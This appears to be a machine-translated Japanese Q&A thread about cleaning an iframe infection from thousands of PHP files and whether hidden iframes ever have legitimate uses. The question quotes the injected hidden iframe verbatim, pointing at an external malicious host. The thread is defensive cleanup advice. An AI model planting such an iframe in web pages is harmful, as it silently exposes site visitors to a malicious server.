2012-02-10 11 views
0

hidden iframeの正当な用途はありますか?私はCan a file be read and written right back with small changes without knowing its encoding in C#?ごとにウィルスを持っていますが、それはphpファイル全体にあります(ファイルごとに1つのエントリーに見えますが、5000ファイルではわかりません)。phpの隠れたiframeの正当な使用はありますか?

私はこれを持っているものを持っていますが、私は内部に少し異なるものが他にあることを確認することはできません。可視性がhiddenのすべてのiframeが悪意のあると仮定できますか?

<iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe>

または多分私はそれを見て私のC#のコードを言うことができる他の方法がありますか?私はファイルやウェブサイトを壊すことはしませんが、私は何かが恋しくなるかもしれないので、正確な価値を探すことはできません。

+0

投稿を編集しても使用されないと面白いことが起こります。iframeコードは表示されません。 – MadBoy

答えて

2

隠されたIFRAMEは、確かに悪意のある目的には役立ちますが、合法的に使用できます。たとえば、非表示のIFRAMEを使用してサーバーへの非同期呼び出しをエミュレートすることができます(ASP.Netは思い出したように、これを一度に行いました)。

私はIFRAMEsを使用してファイルのアップロード制御の制限を回避しています(非表示と非表示の両方でこれに便利です)。

怪しいですが、デフォルトでは悪意のあるわけではありません。

1

私が見た古いトラフィックカウンタの中には、隠されたiFrameを使ってトラフィックをカウントするものがありますが、それは隠されたiFrameの唯一の正当な使用方法です。私は確かにそれを好きではないし、それが私だったら、私もそれらを削除します。

あなたが確認できる別のことは、iFrameが隠されていて、ソースがあなたのドメインのものでない場合です。

+0

ファイル検索に複数のサイト/ドメインが存在します。私はそれが私のドメインであるかどうかを言うことは難しいので、サーバー全体を通して行くだろう。 – MadBoy

+0

スクリプトを作成して、結果をログに記録して、それぞれが正当なものかどうかを確認し、合法であればドメインホワイトリストを作成し、ホワイトリストにない隠れたiframeを削除させることができます。 –

+0

私はこれを行うことができると思う:-)素敵な提案 – MadBoy

関連する問題